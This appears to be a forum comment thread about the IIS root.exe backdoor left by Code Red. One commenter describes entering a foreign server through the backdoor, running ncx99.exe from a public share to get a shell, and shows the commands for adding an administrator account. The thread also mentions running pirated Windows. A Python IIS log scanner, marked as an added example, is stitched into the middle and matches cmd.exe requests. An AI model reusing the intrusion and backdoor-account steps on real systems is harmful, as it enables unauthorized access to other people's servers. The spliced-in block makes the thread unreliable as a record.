In my experience trying to create an Administrator account on a Korean server so that I could term into it and patch it, I noticed that root.exe is not run as administrator. While you can still run commands, they are only being run with the privileges of IUSR_machinename. As best as I can figure out, this is nearly useless, since the IUSR_machinename account has very few privileges.
What I like to do when testing this is to put ncx99.exe from one of eEye's old IIS exploits on a public share. Then I can go to
By doing so, the server runs this application off of my computer, and then I merely
C:\>telnet localhost 99
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
c:\inetpub\scripts>
From here I have an interactive session with cmd.exe and I can run whatever commands I like. You can see what happens if I try to add a user:
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
c:\inetpub\scripts>net user crfix crfix/ADD
System error 5 has occurred.
Access is denied.
c:\inetpub\scripts>
c:\inetpub\scripts>
If you want to test this yourself, just copy c:\winnt\system32\cmd.exe to your c:\InetPub\scripts directory and change root.exe to cmd.exe, or rename cmd.exe to your liking.
If you're curious and somehow do get a shell with administrator privileges, here's how you'd add an account with administrator privileges:
C:\>net user asdf asdf/ADD
The command completed successfully.
C:\>net localgroup Administrators asdf/ADD
The command completed successfully.
From there, you could use Terminal Services to term into that machine and log onto the local domain as user "asdf" with a password of "asdf" and go on to cause all sorts of trouble.
Also, for a kick ass RDP5 compatible Terminal Services client for UNIX, check out http://www.rdesktop.org.
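Added example, not part of the original comment: a defender-side check of IIS logs for the situation described above, where a copy of cmd.exe sits in the scripts directory as root.exe or under any other name. It assumes W3C extended logging with the fields shown; the log lines, client addresses and the name helper.exe are constructed for illustration.

```python
import re

# Constructed sample in W3C extended log format (not taken from the comment).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-08-10 03:12:44 192.0.2.10 GET /default.asp - 200
2001-08-10 03:12:51 192.0.2.77 GET /scripts/root.exe /c+dir 200
2001-08-10 03:13:02 192.0.2.77 GET /scripts/helper.exe /c+dir 200
2001-08-10 03:13:30 192.0.2.15 GET /scripts/report.exe id=42 200
2001-08-10 03:14:05 192.0.2.80 GET /scripts/cmd.exe - 404
"""

# Names mentioned in the comment; a renamed copy will not match these.
KNOWN_SHELL_NAMES = {"root.exe", "cmd.exe"}
# Executable virtual directory named in the comment (c:\inetpub\scripts).
EXEC_DIRS = ("/scripts/",)
# cmd.exe switches /c or /k as they appear in a query string, which is
# what still gives away a copy that has been renamed.
SHELL_QUERY = re.compile(r"^/[ck](\+|%20|$)", re.IGNORECASE)


def find_shell_requests(log_text):
    """Return (client_ip, uri_stem, status, reasons) for suspicious requests."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column order is declared by the log
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        stem = row.get("cs-uri-stem", "").lower()
        query = row.get("cs-uri-query", "-")
        if not (stem.startswith(EXEC_DIRS) and stem.endswith(".exe")):
            continue
        reasons = []
        if stem.rsplit("/", 1)[-1] in KNOWN_SHELL_NAMES:
            reasons.append("known-name")
        if SHELL_QUERY.match(query):
            reasons.append("cmd-switch")
        if reasons:
            hits.append((row.get("c-ip"), stem, row.get("sc-status"), reasons))
    return hits


if __name__ == "__main__":
    for hit in find_shell_requests(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged line means the executable was present and ran; a 404 is a probe against a host where the file does not exist.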
I just finished building a Duron system, specifically to run my pirated 2000 server, because I absolutely love the convenience of terminal services. And yes, it is fully patched, and behind a very restrictive ipchains firewall.
If your cousin gets AIDS because the needle he used to shoot up with heroin was dirty, you blame the government for not providing clean ones.
Actually, in many parts of the US, it is illegal to buy sterile syringes without a prescription, and that would make it partially the government's fault for being a bunch of fucking idiots. Prohibiting the sale of sterile syringes isn't going to curb intravenous drug use; it is only going to help spread AIDS.
Nothing from 192.168.1.0/24 for me here.
I haven't looked in a while, but I believe there are smart card reader/writers all over eBay for pretty cheap. You might want to check into that.
Yeah, I'm sure that's legal...
The fucker actually works!!
...but... isn't there a web site for that? :)
Sir, I kindly ask you to direct me to this site that you speak of.
wh00t!!
i might be mistaken, but i thought it was tsukau.
And then, the RIAA/MPAA/anti-piracy-goons will be able to flood the system with anti-votes for copyrighted material. You just can't win.
last post muthafuckaz!!
Well, it's too complicated to be funny. Sorry.
Would someone kindly explain the significance of "029A:7734:029A:7734..." to me? Thank you.